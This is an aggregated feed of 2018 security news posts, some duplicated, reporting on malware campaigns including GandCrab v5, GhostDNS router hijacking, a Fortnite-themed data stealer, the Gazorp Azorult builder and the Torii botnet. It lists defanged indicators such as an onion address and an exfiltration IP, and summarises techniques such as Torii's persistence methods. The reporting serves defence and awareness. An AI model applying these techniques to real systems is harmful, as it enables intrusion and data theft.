“Based on the original filename, we can surmise this malware sample targeted individuals interested in the World Cup hosted in Russia in 2018. As we can see in the figure below, the unique deobfuscation routine used between the samples is identical, including the comments included by the author.” reads the report published by Palo Alto Networks.

NOKKI vs WordCup malware

“While the deobfuscation routine was identical, the actual functionality of the macro differed slightly. The NOKKI dropper samples downloaded both a payload and a decoy document, but this World Cup predictions malware sample downloads and executes a remote VBScript file wrapped in HTML and appends text to the original Word document to provide the lure for the victim.”

The VBScript file used the same deobfuscation routine and fetches and executes a dropper tracked as Final1stspy that in turn downloads a strain of the DOGCALL malware.

The malware implements backdoor features, can take screenshots, log keystrokes, enable the microphone, collect victim information, collect files of interest, and download and execute additional payloads.

The malware connects the command and control (C&C) via third-party hosting services such as Dropbox, pCloud, Yandex Cloud, and Box.

“What originally began as research surrounding a new malware family named NOKKI that had code overlap and other ties to KONNI lead us to an interesting discovery tying the NOKKI malware family to the Reaper threat actor group.” Palo Alto Networks concludes.

“Additionally, we discovered yet another malware family that has not been previously publicly reported that we have named Final1stspy,” 

Pierluigi Paganini

(Security Affairs – NOKKI malware, North Korea)

The post Researchers associated the recently discovered NOKKI Malware to North Korean APT appeared first on Security Affairs.



Security Affairs

Z-LAB Report – Analyzing the GandCrab v5 ransomware

Experts at the Cybaze Z-Lab have analyzed the latest iteration of the infamous GandCrab ransomware, version 5.0.

Malware researchers at Cybaze ZLab analyzed the latest version of the infamous GandCrab ransomware, version 5.0. Most of the infections have been observed in central Europe, but experts found evidence that the malicious code doesn’t infect Russian users. GandCrab operates like a classic ransomware, it encrypts all user files and drops some ransom notes on the infected machine.

The ransomware uses a pseudo-randomic extension (5 characters long), that is different for each infection (some of these extensions are: .txvpq, .rttmc, .mcbot, etc…).

The ransom note contains some information related to the infection: an ID (“fed0a66240f8743f”, in the image below), a “GANDCRAB KEY”, required to restore the original files, and some encrypted information about the infected system such as the username, the PC name, the domain, the operative system and the language.

GandCrab 5

Unlike GandCrab v4, this version is able to kill some processes associated with some popular applications (i.e. Word, Excel, SQLServer etc.) to allow the code to encrypt the files opened by these applications.

GandCrab 5

The payment process is implemented through the hidden service associated with the Tor address:

hxxp://gandcrabmfe6mnef[.]onion, which is the same used by previous versions of the malware.

Technical details, including IoCs and Yara Rules, are reported in the analysis shared by researchers at the ZLab.

You can download the full ZLAB Malware Analysis Report at the following URL:

http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf

 

Pierluigi Paganini

(Security Affairs – ransomare, cybercrime)

The post Z-LAB Report – Analyzing the GandCrab v5 ransomware appeared first on Security Affairs.

Security Affairs: Z-LAB Report – Analyzing the GandCrab v5 ransomware

Experts at the Cybaze Z-Lab have analyzed the latest iteration of the infamous GandCrab ransomware, version 5.0.

Malware researchers at Cybaze ZLab analyzed the latest version of the infamous GandCrab ransomware, version 5.0. Most of the infections have been observed in central Europe, but experts found evidence that the malicious code doesn’t infect Russian users. GandCrab operates like a classic ransomware, it encrypts all user files and drops some ransom notes on the infected machine.

The ransomware uses a pseudo-randomic extension (5 characters long), that is different for each infection (some of these extensions are: .txvpq, .rttmc, .mcbot, etc…).

The ransom note contains some information related to the infection: an ID (“fed0a66240f8743f”, in the image below), a “GANDCRAB KEY”, required to restore the original files, and some encrypted information about the infected system such as the username, the PC name, the domain, the operative system and the language.

GandCrab 5

Unlike GandCrab v4, this version is able to kill some processes associated with some popular applications (i.e. Word, Excel, SQLServer etc.) to allow the code to encrypt the files opened by these applications.

GandCrab 5

The payment process is implemented through the hidden service associated with the Tor address:

hxxp://gandcrabmfe6mnef[.]onion, which is the same used by previous versions of the malware.

Technical details, including IoCs and Yara Rules, are reported in the analysis shared by researchers at the ZLab.

You can download the full ZLAB Malware Analysis Report at the following URL:

http://csecybsec.com/download/zlab/20181001_CSE_GandCrabv5.pdf

 

Pierluigi Paganini

(Security Affairs – ransomare, cybercrime)

The post Z-LAB Report – Analyzing the GandCrab v5 ransomware appeared first on Security Affairs.



Security Affairs

DanaBot Observed in Large Campaign Targeting U.S. Organizations

Researchers observed the distribution of the DanaBot banking trojan in a large attack campaign targeting U.S. organizations. On 26 September, Proofpoint detected a campaign consisting of hundreds of thousands of emails intended for U.S. recipients. Each of these attack messages masqueraded as an eFax and used a “Download Fax” link to download a document containing […]… Read More

The post DanaBot Observed in Large Campaign Targeting U.S. Organizations appeared first on The State of Security.

Crypto-Security Testnet Surpasses Key Milestones

Security and has been combined with micro-compucomputing are a combination which ascended to greatly relevant, both economically and financially, since the early days of commercial internet technology, the John McAfee associated era of anti-virus software, and fears of ‘millennium-bug’ (‘Y2K’)-induced societal meltdowns. As a market player, ‘cybersecurity‘ is hailed for its continuedvalue and growth, with […]

The post Crypto-Security Testnet Surpasses Key Milestones appeared first on Hacked: Hacking Finance.

Episode 114: Complexity at Root of Facebook Breach and LoJax is a RAT You Can’t Kill

In this week’s podcast: Facebook revealed that a breach affected 50 million accounts and as many as 90 million users. Is complexity at the root of the social media giant’s troubles? We speak with Gary McGraw of the firm Synopsys about it. Also: BIOS-based malware has been demonstrated at security conferences for years.  Last week, the...

Read the whole entry... »

Related Stories

Meet GhostDNS: The dangerous malware behind IoT botnet targeting banks

By Waqas

Security researchers at NetLab, a sub-division of the Chinese cybersecurity firm Qihoo 360, have discovered a new, wide-scale, and very active malware campaign that has managed to hijack more than 100,000 home routers between Sept 21 and 27. A majority of routers (almost 88%) are located in Brazil. The malware has been dubbed GhostDNS. Once […]

This is a post from HackRead.com Read the original post: Meet GhostDNS: The dangerous malware behind IoT botnet targeting banks

Astaroth Trojan Malware Returns to Infect South American Users

A new wave of Astaroth Trojan malware has resurfaced in South America, with more than 8,000 machines attacked in just one week.

According to the Cofense Phishing Defense Center, the Trojan used fake invoice emails with .lnk attachments that appeared to come from legitimate services under cam.br domains. It specifically targeted South American businesses — any attacks that detected an IP address outside of this geographic area were aborted.

If South American targets clicked on the provided link, Astaroth — the “Great Duke of Hell” in ancient lore — leveraged the Windows Management Instrumentation Console (WMIC) and its connected command-line interface to download nonlocal payloads with .xsl extensions.

Because the WMIC was run in noninteractive mode, users were typically unaware of the compromise. The malware then prevented users from opening any web browser except Internet Explorer, and when users navigated to Brazilian banks or businesses, it began recording keystrokes for data collection and account compromise.

How Does Astaroth Avoid Detection?

Astaroth first emerged in 2017, but Cofense noted that the revived campaign “has been well planned and supported, exclusively targeting South Americans.”

Despite its limited radius, however, the Trojan malware presents real concerns for organizations. To evade detection, the malware uses a randomly selected domain from a list of 154 in-code options. All the domains were hosted on Cloudflare, making it difficult to immediately identify them as malicious. This also made it hard for companies to effectively block Astaroth payloads due to the sheer number of legitimate domains associated with Cloudflare.

Furthermore, given the utility of the WMIC in managing Windows hosts, it remains a popular tool for corporate administrators — making it the ideal vehicle for Astaroth. It also makes it difficult for companies to avoid infection, since the WMIC is often a key part of day-to-day operations.

How to Protect Your Organization From Trojan Malware

To avoid Astaroth, IBM X-Force Exchange recommends implementing a separate verification process for email attachments. This could take the form of texts, phone calls or other secure communications. If users can easily verify that unexpected emails were not sent by legitimate vendors or clients, they can delete them instead of potentially exposing systems to risk.

Security professionals also suggest using continuous backup solutions coupled with regular account monitoring to limit the impact of data-stealing Trojan malware and prevent keyloggers from stealing password and login data.

Source: Cofense Phishing Defense Center

The post Astaroth Trojan Malware Returns to Infect South American Users appeared first on Security Intelligence.

Fortnite gamers targeted by data theft malware

The new season of the incredibly popular video game Fortnite is upon us, and so too are the scams. It’s no surprise that con artists would jump on this bandwagon, eager to peddle their fakeouts.

Only this time, scammers had something a little more dangerous in mind than your typical low-level surveys and downloads that never actually materialize. Among all the gluttony of scams there hid a malicious file ready to steal data and Bitcoin, for starters.

How did we find it? First, we sifted through a sizable mish-mash of free season six passes, supposedly “free” Android versions of Fortnite, which were leaked out from under the developer’s noses, the ever-popular blast of “free V-Bucks” used to purchase additional content in the game, and a lot of bogus cheats, wallhacks, and aimbots.

Here’s the current state of YouTube, for example:

fortnite search results

Click to enlarge

These videos can drive huge numbers: Here’s one that’s been pulled down, but managed to rack up 120,000 views before the hammer fell:

120k views

Click to enlarge

Almost all of the scam tomfoolery followed the typical survey route, as expected. But buried in all of this was a nasty little slice of data theft malware disguised as a cheat tool.

Offering up a malicious file under the pretense of a cheat is as old school as it gets, but that’s never stopped cybercriminals before. In this scenario, would-be cheaters suffer a taste of their own medicine via a daisy chain of clickthroughs and (eventually) some malware as a parting gift. Shall we take a look?

Setting the scene

The YouTube account offering this scam up has a little over 700 subscribers, and the video in question already had more than 2,200 views the day after being uploaded.

fortnite aimbot video

Click to enlarge

Clicking the link sends potential victims to a page on Sub2Unlock. This site differs from typical survey pages, where you’d normally click offers or fill in questions to obtain a theoretical reward. Instead, it asks you to hit subscribe on the social portal of the person sending you there in the first place. So there’s one difference, right off the bat.

sub to unlock

Click to enlarge

Another interesting difference is that any initial survey page requires you to physically complete a survey before progressing. Without doing this, you can’t gain access to a download link.

Here, we had no validation taking place during our testing. Clicking the subscribe button simply opened up the YouTube channel’s subscribe page but nothing checked to ensure we’d actually subscribed. All we had to do at this point was go back to the Sub2Unlock site and click the download button.

From here, gamers are whisked away to a site located at

bt-fortnite-cheats(dot)tk

fortnite cheat site

Click to enlarge

This site is a fairly good-looking portal claiming to offer up the desired cheat tools, and it stands a fair chance of convincing youngsters of its legitimacy. A little bit more button clicking, and potential victims are taken to a more general download site containing what appears to be an awful lot of files alongside a wide range of adverts.

fortnite malware download link

Click to enlarge

As far as the malicious file in question goes, at time of writing, 1,207 downloads had taken place. That’s 1,207 downloads too many.

File information

Malwarebytes detects this file as Trojan.Malpack, a generic detection given to files packed suspiciously. The actual payload could be anything at all, but it will invariably be up to no good. In this case, a little digging showed us the payload is a data stealer.

Once the initial .EXE (which weighs in at just 168KB) runs on the target system, it performs some basic enumeration on details specific to the infected computer. It then attempts to send data via a POST command to an /index.php file in the Russian Federation, courtesy of the IP address 5(dot)101(dot)78(dot)169.

Some of the most notable things it takes an interest in are browser session information, cookies, Bitcoin wallets, and also Steam sessions.

a grab bag

Click to enlarge

Bizarrely, it also wrote this to our test system:

radio stations

Click to enlarge

…Grateful Dead, anyone?

The IP address up above has been seen many times in relation to similarly named/themed files.

Lots of the files contained in this download are packed in entirely different ways. One of them has a process called “Stealer.exe.” Many more post the stolen information to /gate.php instead of index.php, which is a common sign of Zbot and a few others.

While this particular file probably isn’t that new, it’s still going to do a fair bit of damage to anyone that runs in. Combining it with the current fever for new Fortnite content is a recipe for stolen data and a lot of cleanup required afterward.

As a final note, we should mention the readme file accompanying the stealer advertises being able to purchase additional Fortnite cheats for “$80 Bitcoin.”

read me

Click to enlarge

Given how things up above panned out, we’d advise anyone tempted to cheat to steer well clear of this one. Winning is great, but it’s absolutely not worth risking a huge slice of personal information to get the job done.

The post Fortnite gamers targeted by data theft malware appeared first on Malwarebytes Labs.

The ‘Gazorp’ Azorult Builder emerged from the Dark Web

Checkpoint experts discovered in the Dark Web an online builder, dubbed Gazorp, that allows crooks to create customized binaries for the Azorult malware.

Security researchers from Checkpoint have discovered in the Dark Web an online builder, dubbed Gazorp, that allows crooks to easily create customized binaries for the Azorult info-stealing malware.

The Gazorp builder allows generating for free the malicious code to steal passwords, payment information, cryptocurrency wallet data and more.

“On 17th September Check Point Research found a new online builder, dubbed ‘Gazorp’, hosted on the Dark Web. Gazorp is designed for building binaries of the popular malware, Azorult, an infostealer used for stealing user passwords, credit card information, ” states CheckPoint.

“Furthermore, the Gazorp service is provided free of charge and gives threat actors the ability to create fresh Azorult samples and corresponding panel server code, leaving them simply to provide their Command & Control (C&C) address. This address gets embedded into the newly created binary, which in turn can be distributed in any way the threat actor sees fit.”

Check Point researchers took the platform for a test-drive and found that Gazorp does, indeed, perform as advertised, “effectively” creating samples of Azorult version 3.0.

Experts at CheckPoint have tried the Gazorp builder and successfully generated working samples of Azorult version 3.0.

Gazorp Azorult Builder

This version of the malware was observed in the wild five months ago, since then, it was updated two times, experts discovered the versions, 3.1 and 3.2 in live attacks.

Azorult has been around since at least 2016, malware researchers at Proofpoint spotted a new version of the AZORult Spyware in the wild, it was involved in a large email campaign on July 18, just 24 hours it appeared in cybercrime forums on the Dark Web.

Experts also noted that Gazorp’s emergence on the Dark Web was the result of the leak of the code for the Azorult’s panel (for versions 3.1 and 3.2).

The availability of the code allows anyone to easily create its own version of the Azorult C&C panel, the experts added that the leak also contained a builder for the latest version of the malware. This builder isn’t the original one used by the authors, “it merely encoded and placed the C&C address string given to it as an argument by the user to a particular field in a ready-made binary.”

“It is possible then that the simple mechanism and the overall delivery of the recent versions to the public inspired Gazorp’s authors to introduce it online.” continues the analysis.

The online builder links to a Telegram channel used by the authors to update users on their activity and to share updates on the project.

Gazorp authors plan to implement future extensibility with a “modules” section, the ability to configure the panel and export the various databases to a file.

Experts believe we can soon assist at a spike of campaigns leveraging the Azorult info-stealer generated with the Gazorp builder.

“For now, it seems we are looking at a very early version of the Gazorp service (0.1), where the main product delivered is an enhanced Azorult C&C panel code. However, we do expect the project to evolve with time, and possibly produce new variants for Azorult.” concludes CheckPoint.

“Given that the service is free, it is also possible that new campaigns with Gazorp built binaries will start to emerge in higher scale in the wild. We will keep monitoring this threat and provide any insights on our research blog when such will come up.”

Pierluigi Paganini

(Security Affairs – Gazorp builder, malware)

The post The ‘Gazorp’ Azorult Builder emerged from the Dark Web appeared first on Security Affairs.

Security Affairs: The ‘Gazorp’ Azorult Builder emerged from the Dark Web

Checkpoint experts discovered in the Dark Web an online builder, dubbed Gazorp, that allows crooks to create customized binaries for the Azorult malware.

Security researchers from Checkpoint have discovered in the Dark Web an online builder, dubbed Gazorp, that allows crooks to easily create customized binaries for the Azorult info-stealing malware.

The Gazorp builder allows generating for free the malicious code to steal passwords, payment information, cryptocurrency wallet data and more.

“On 17th September Check Point Research found a new online builder, dubbed ‘Gazorp’, hosted on the Dark Web. Gazorp is designed for building binaries of the popular malware, Azorult, an infostealer used for stealing user passwords, credit card information, ” states CheckPoint.

“Furthermore, the Gazorp service is provided free of charge and gives threat actors the ability to create fresh Azorult samples and corresponding panel server code, leaving them simply to provide their Command & Control (C&C) address. This address gets embedded into the newly created binary, which in turn can be distributed in any way the threat actor sees fit.”

Check Point researchers took the platform for a test-drive and found that Gazorp does, indeed, perform as advertised, “effectively” creating samples of Azorult version 3.0.

Experts at CheckPoint have tried the Gazorp builder and successfully generated working samples of Azorult version 3.0.

Gazorp Azorult Builder

This version of the malware was observed in the wild five months ago, since then, it was updated two times, experts discovered the versions, 3.1 and 3.2 in live attacks.

Azorult has been around since at least 2016, malware researchers at Proofpoint spotted a new version of the AZORult Spyware in the wild, it was involved in a large email campaign on July 18, just 24 hours it appeared in cybercrime forums on the Dark Web.

Experts also noted that Gazorp’s emergence on the Dark Web was the result of the leak of the code for the Azorult’s panel (for versions 3.1 and 3.2).

The availability of the code allows anyone to easily create its own version of the Azorult C&C panel, the experts added that the leak also contained a builder for the latest version of the malware. This builder isn’t the original one used by the authors, “it merely encoded and placed the C&C address string given to it as an argument by the user to a particular field in a ready-made binary.”

“It is possible then that the simple mechanism and the overall delivery of the recent versions to the public inspired Gazorp’s authors to introduce it online.” continues the analysis.

The online builder links to a Telegram channel used by the authors to update users on their activity and to share updates on the project.

Gazorp authors plan to implement future extensibility with a “modules” section, the ability to configure the panel and export the various databases to a file.

Experts believe we can soon assist at a spike of campaigns leveraging the Azorult info-stealer generated with the Gazorp builder.

“For now, it seems we are looking at a very early version of the Gazorp service (0.1), where the main product delivered is an enhanced Azorult C&C panel code. However, we do expect the project to evolve with time, and possibly produce new variants for Azorult.” concludes CheckPoint.

“Given that the service is free, it is also possible that new campaigns with Gazorp built binaries will start to emerge in higher scale in the wild. We will keep monitoring this threat and provide any insights on our research blog when such will come up.”

Pierluigi Paganini

(Security Affairs – Gazorp builder, malware)

The post The ‘Gazorp’ Azorult Builder emerged from the Dark Web appeared first on Security Affairs.



Security Affairs

How Digital Transformation is forcing GRC to evolve

As new risks emerge, security and risk management are converging and driving the development of integrated risk management, writes David Walter, the Vice President of RSA's Archer division.

The post How Digital Transformation is forcing GRC to evolve appeared first on The Security Ledger.

Related Stories

NBlog Oct – phishing awareness & training module

It's out: a fully revised (almost completely rewritten!) awareness and training module on phishing.

Phishing is one of many social engineering threats, perhaps the most widespread and most threatening.

Socially-engineering people into opening malicious messages, attachments and links has proven an effective way to bypass many technical security controls.

Phishing is a business enterprise, a highly profitable and successful one making this a growth industry. Typical losses from phishing attacks have been estimated at $1.6m per incident, with some stretching into the tens and perhaps hundreds of millions of dollars.

Just as Advanced Persistent Threat (APT) takes malware to a higher level of risk, so Business Email Compromise (BEC) puts an even more sinister spin on regular phishing. With BEC, the social engineering is custom-designed to coerce employees in powerful, trusted corporate roles to compromise their organizations, for example by making unauthorized and inappropriate wire transfers or online payments from corporate bank accounts to accounts controlled by the fraudsters.

As with ordinary phishing, the fraudsters behind BEC and other novel forms of social engineering have plenty of opportunities to develop variants of existing attacks as well as developing totally novel ones. Therefore, we can expect to see more numerous, sophisticated and costly incidents as a result. Aggressive dark-side innovation is a particular feature of the challenges in this area, making creative approaches to awareness and training (such as NoticeBored!) even more valuable. We hope to prompt managers and professionals especially to think through the ramifications of the specific incidents described, generalize the lessons and consider the broader implications. We’re doing our best to make the organization future-proof. It’s a big ask though! Good luck.

Learning objectives

October’s module is designed to:
  • Introduce and explain phishing and related threats in straightforward terms, illustrated with examples and diagrams;
  • Expand on the associated information risks and controls, from the dual perspectives of individuals and the organization;
  • Encourage individuals to spot and react appropriately to possible phishing attempts targeting them personally;
  • Encourage workers to spot and react appropriately to phishing and BEC attacks targeting the organization, plus other social engineering attacks, frauds and scams;
  • Stimulate people to think - and most of all act - more securely in a general way, for example being more alert for the clues or indicators of trouble ahead, and reporting them.
Consider your organization’s learning objectives in relation to phishing. Are there specific concerns in this area, or just a general interest? Has your organization been used as a phishing lure, maybe, or suffered spear-phishing or BEC incidents? Do you feel particularly vulnerable in some way, perhaps having narrowly avoided disaster (a near-miss)? Are there certain business units, departments, functions, teams or individuals that could really do with a knowledge and motivational boost? Lots to think about this month!

Content outline



Get in touch to purchase the phishing module alone, or to subscribe to the NoticeBored service for more like this every month. Phishing is undoubtedly an important topic for awareness and training, but definitely not the only one. Build and sustain your corporate security culture through NoticeBored.

Security Affairs: GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers

Security experts from Qihoo 360 NetLab spotted GhostDNS, a malware that already infected over 100K+ devices and targets 70+ different types of routers

Security experts from Qihoo 360 NetLab have uncovered an ongoing hacking campaign that leverages the GhostDNS malware. Attackers have already hijacked over 100,000 home routers, the malicious code allows to modify DNS settings to hijack the traffic and redirect users to phishing websites.

Between September 21 and 27, the GhostDNS campaign compromised more than 100,000 routers, most of them (87.8%) located in Brazil.

GhostDNS reminds us of the infamous DNSChanger malware that made the headlines for its ability to change DNS settings on the infected device

GhostDNS scans for the IP addresses used by routers that use weak or no password then accesses them and changes the DNS settings to a rogue DNS server operated by the attackers.

“Just like the regular dnschanger, this campaign attempts to guess the password on the router’s web authentication page or bypass the authentication through the dnscfg.cgi exploit, then changes the router’s default DNS address to the Rogue DNS Server[3]through the corresponding DNS configuration interface.” reads the analysis published by the experts.

“But this campaign has more, we have found three related DNSChanger programs, which we call Shell DNSChanger, Js DNSChanger and PyPhp DNSChanger according to their programming languages.”

GhostDNS

The GhostDNS has a modular structure composed of four components:

1) DNSChanger Module: The main module designed to exploit targeted routers, it has three sub-modules dubbed, Shell DNSChanger, Js DNSChanger, and PyPhp DNSChanger.

1.) Shell DNSChanger is written in the Shell programming language and combines 25 Shell scripts that allow the malware to carry out brute-force attacks on routers or firmware packages from 21 different manufacturers.
2.) Js DNSChanger is written in JavaScript and includes 10 attack scripts designed to infect 6 routers or firmware packages. It includes scanners, payload generators, and attack programs. The Js DNSChanger program is usually injected into phishing websites, so it works together with the Phishing Web System.
3.) PyPhp DNSChanger is written in Python and PHP, it contains 69 attack scripts designed to target 47 different routers/firmware. The component has been found deployed on over 100 servers, most of which on Google Cloud, it includes functionalities like Web API, Scanner and Attack module. Experts believe this sub-module is the core module of DNSChanger that allows attackers to scan the Internet to find vulnerable routers.

2) Web Admin module: Experts believe it implements an admin panel for attackers secured with a login page.

3) Rogue DNS module: The module resolves targeted domain names from the attacker-controlled web servers. At the time of the investigation, the expert had no access to the Rouge DNS server, for this reason, it was not possible to know the exact number DNS entries used to hijack legitimate domains.

4) Phishing Web module:  The module implements phishing pages for the domains targeted in this campaign.

Attackers appear to be focused on Brazil where mainly targeted major banks.

“Currently the campaign mainly focuses on Brazil, we have counted 100k+ infected router IP addresses (87.8% located in Brazil), and 70+ router/firmware have been involved, and 50+ domain names such as some big banks in brazil , even Netflix, Citibank.br have been hijacked to steal the corresponding website login credentials,” continues the researchers.

Experts warn of the threat GhostDNS malware poses to Internet sue to its scalability and the availability of multiple attack vector.

Further details, including IoCs are reported in the analysis published by Qihoo 360 NetLab.

Pierluigi Paganini

(Security Affairs – GhostDNS, IoT)

The post GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers appeared first on Security Affairs.



Security Affairs

GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers

Security experts from Qihoo 360 NetLab spotted GhostDNS, a malware that already infected over 100K+ devices and targets 70+ different types of routers

Security experts from Qihoo 360 NetLab have uncovered an ongoing hacking campaign that leverages the GhostDNS malware. Attackers have already hijacked over 100,000 home routers, the malicious code allows to modify DNS settings to hijack the traffic and redirect users to phishing websites.

Between September 21 and 27, the GhostDNS campaign compromised more than 100,000 routers, most of them (87.8%) located in Brazil.

GhostDNS reminds us of the infamous DNSChanger malware that made the headlines for its ability to change DNS settings on the infected device

GhostDNS scans for the IP addresses used by routers that use weak or no password then accesses them and changes the DNS settings to a rogue DNS server operated by the attackers.

“Just like the regular dnschanger, this campaign attempts to guess the password on the router’s web authentication page or bypass the authentication through the dnscfg.cgi exploit, then changes the router’s default DNS address to the Rogue DNS Server[3]through the corresponding DNS configuration interface.” reads the analysis published by the experts.

“But this campaign has more, we have found three related DNSChanger programs, which we call Shell DNSChanger, Js DNSChanger and PyPhp DNSChanger according to their programming languages.”

GhostDNS

The GhostDNS has a modular structure composed of four components:

1) DNSChanger Module: The main module designed to exploit targeted routers, it has three sub-modules dubbed, Shell DNSChanger, Js DNSChanger, and PyPhp DNSChanger.

1.) Shell DNSChanger is written in the Shell programming language and combines 25 Shell scripts that allow the malware to carry out brute-force attacks on routers or firmware packages from 21 different manufacturers.
2.) Js DNSChanger is written in JavaScript and includes 10 attack scripts designed to infect 6 routers or firmware packages. It includes scanners, payload generators, and attack programs. The Js DNSChanger program is usually injected into phishing websites, so it works together with the Phishing Web System.
3.) PyPhp DNSChanger is written in Python and PHP, it contains 69 attack scripts designed to target 47 different routers/firmware. The component has been found deployed on over 100 servers, most of which on Google Cloud, it includes functionalities like Web API, Scanner and Attack module. Experts believe this sub-module is the core module of DNSChanger that allows attackers to scan the Internet to find vulnerable routers.

2) Web Admin module: Experts believe it implements an admin panel for attackers secured with a login page.

3) Rogue DNS module: The module resolves targeted domain names from the attacker-controlled web servers. At the time of the investigation, the expert had no access to the Rouge DNS server, for this reason, it was not possible to know the exact number DNS entries used to hijack legitimate domains.

4) Phishing Web module:  The module implements phishing pages for the domains targeted in this campaign.

Attackers appear to be focused on Brazil where mainly targeted major banks.

“Currently the campaign mainly focuses on Brazil, we have counted 100k+ infected router IP addresses (87.8% located in Brazil), and 70+ router/firmware have been involved, and 50+ domain names such as some big banks in brazil , even Netflix, Citibank.br have been hijacked to steal the corresponding website login credentials,” continues the researchers.

Experts warn of the threat GhostDNS malware poses to Internet sue to its scalability and the availability of multiple attack vector.

Further details, including IoCs are reported in the analysis published by Qihoo 360 NetLab.

Pierluigi Paganini

(Security Affairs – GhostDNS, IoT)

The post GhostDNS malware already infected over 100K+ devices and targets 70+ different types of home routers appeared first on Security Affairs.

GhostDNS: New DNS Changer Botnet Hijacked Over 100,000 Routers

Chinese cybersecurity researchers have uncovered a widespread, ongoing malware campaign that has already hijacked over 100,000 home routers and modified their DNS settings to hack users with malicious web pages—especially if they visit banking sites—and steal their login credentials. Dubbed GhostDNS, the campaign has many similarities with the infamous DNSChanger malware that works by

Security Affairs newsletter Round 182 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      Hackers target Port of Barcelona, maritime operations had not affected
·      New Virobot malware combines ransomware and botnet capabilities
·      A bug in Twitter Account Activity API exposed users messages to wrong developers
·      Critical flaw affects Cisco Video Surveillance Manager
·      Experts uncovered a new Adwind campaign aimed at Linux, Windows, and macOS systems
·      Firefox DoS issue crashes the browser and sometimes the Windows OS
·      Akamai Report: Credential stuffing attacks are a growing threat
·      Bitcoin Core Team fixes a critical DDoS flaw in wallet software
·      SHEIN Data breach affected 6.42 million users
·      White hat hacker found a macOS Mojave privacy bypass 0-day flaw on release day
·      Crooks leverages Kodi Media Player add-ons for malware distribution
·      Former NSA TAO hacker sentenced to 66 months in prison over Kaspersky Leak
·      Hide and Seek (HNS) IoT Botnet targets Android devices with ADB option enabled
·      oPatch community released micro patches for Microsoft JET Database Zero-Day
·      Mutagen Astronomy Linux Kernel vulnerability affects Red Hat, CentOS, and Debian distros
·      Pangu hackers are back, they realized the iOS 12 Jailbreak
·      Russian Sednit APT used the first UEFI rootkit of ever in attacks in the wild
·      Talos experts published technical details for other seven VPNFilter modules
·      Uber agrees to pay $148 million in massive 2016 data breach settlement
·      CVE-2018-1718 -Google Project Zero reports a new Linux Kernel flaw
·      CVE-2018-17182 -Google Project Zero reports a new Linux Kernel flaw
·      Facebook hacked – 50 Million Users Data exposed in the security breach
·      Port of San Diego hit by a cyber attack a few days after the attack on the Port of Barcelona
·      QRecorder app in the Play Store was hiding a Banking Trojan that targets European banks
·      Facebook: User shadow data, including phone numbers may be used by advertisers
·      Torii botnet, probably the most sophisticated IoT botnet of ever
·      Trustwave expert found 2 credential leak issues in Windows PureVPN Client

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 182 – News of the week appeared first on Security Affairs.

Security Affairs: Torii botnet, probably the most sophisticated IoT botnet of ever

Avast spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealth of the numerous Mirai variants previously analyzed.

Security researchers spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealth of the numerous Mirai variants previously analyzed.

According to experts from Avast, the Torii bot has been active since at least December 2017, it could targets a broad range of architectures, including ARM, MIPS, x86, x64, PowerPC, and SuperH.

The Torii IoT botnet stands out for the largest sets of architectures it is able to target.

“Over the past week, we have been observing a new malware strain, which we call Torii, that differs from Mirai and other botnets we know of, particularly in the advanced techniques it uses.” reads the analysis published by Avast

“Unlike the aforementioned IoT botnets, this one tries to be more stealthy and persistent once the device is compromised, and it does not (yet) do the usual stuff a botnet does like DDOS, attacking all the devices connected to the internet, or, of course, mining cryptocurrencies.”

According to the experts, the Torii botnet is being used for stealing data from compromised IoT devices. The bot exfiltrates several data from compromised devices, including hostname and process ID.

The malicious code has a modular structure that is capable of fetching and executing other commands and executables, it leverages multiple layers of encrypted communication to avoid detection.

Another peculiarity of the Torii botnet it that it implements more than six ways to achieve persistence on the infected devices.

“Afterwards, the dropper makes sure that the second stage payload is executed and that it will remain persistent. It is unique in that it is remarkably thorough in how it achieves persistence.” continues the analysis.

“It uses at least six methods to make sure the file remains on the device and always runs. And, not just one method is executed – it runs all of them.

    1. Automatic execution via injected code into ~\.bashrc
    2. Automatic execution via “@reboot” clause in crontab
    3. Automatic execution as a “System Daemon” service via systemd
    4. Automatic execution via /etc/init and PATH. Once again, it calls itself “System Daemon”
    5. Automatic execution via modification of the SELinux Policy Management
    6. Automatic execution via /etc/inittab

Torii infects devices with Telnet exposed and protected by weak credentials, it first executes a sophisticated script used to determines the architecture of the target.

The script then downloads the first-stage payload that acts as a dropper for the second-stage payload.

Experts said that the bot component communicates with the CnC with active polling in an endless loop, waiting for commands to execute. Once executed the command, the bot will reply with the results of its execution.

The samples analyzed by the expert were communicating with a command-and-control server that is located in Arizona.

At the time of the analysis, Telnet is the only vector used by the bot to compromise other devices.

According to BleepingComputer, the malicious code was also analyzed by the Italian cyber security expert Marco Ramilli who noticed similarities to the Persirai.

“Even though our investigation is continuing, it is clear that Torii is an example of the evolution of IoT malware, and that its sophistication is a level above anything we have seen before.” concludes the analysis.

“Once it infects a device, not only does it send quite a lot of information about the machine it resides on to the CnC, but  by communicating with the CnC, it allows Torii authors to execute any code or deliver any payload to the infected device. This suggests that Torii could become a modular platform for future use.”

Further details, including IoCs are reported in the analysis published by Avast.

Pierluigi Paganini

(Security Affairs – Torii IoT botnet, hacking)

The post Torii botnet, probably the most sophisticated IoT botnet of ever appeared first on Security Affairs.



Security Affairs

Torii botnet, probably the most sophisticated IoT botnet of ever

Avast spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealth of the numerous Mirai variants previously analyzed.

Security researchers spotted a new IoT botnet, tracked as Torii, that appears much more sophisticated and stealth of the numerous Mirai variants previously analyzed.

According to experts from Avast, the Torii bot has been active since at least December 2017, it could targets a broad range of architectures, including ARM, MIPS, x86, x64, PowerPC, and SuperH.

The Torii IoT botnet stands out for the largest sets of architectures it is able to target.

“Over the past week, we have been observing a new malware strain, which we call Torii, that differs from Mirai and other botnets we know of, particularly in the advanced techniques it uses.” reads the analysis published by Avast

“Unlike the aforementioned IoT botnets, this one tries to be more stealthy and persistent once the device is compromised, and it does not (yet) do the usual stuff a botnet does like DDOS, attacking all the devices connected to the internet, or, of course, mining cryptocurrencies.”

